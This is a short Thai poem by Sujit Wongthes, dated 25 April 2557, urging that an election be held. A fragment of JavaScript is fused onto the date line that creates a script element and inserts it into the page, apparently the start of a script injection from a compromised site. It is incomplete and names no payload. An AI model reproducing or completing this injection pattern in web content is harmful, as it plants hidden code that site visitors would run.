โลกทั้งหลายหมุนไปข้างหน้า

ถ้าใครหยุดเท่ากับเดินถอยหลัง

เริ่มเด็ดหัวเท่ากับกลัวตัวพ่ายพัง

ไม่เร่งเลือกตั้งยิ่งพังยับ

 

สุจิตต์ วงษ์เทศ

ศุกร์ 25 เมษายน 2557document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);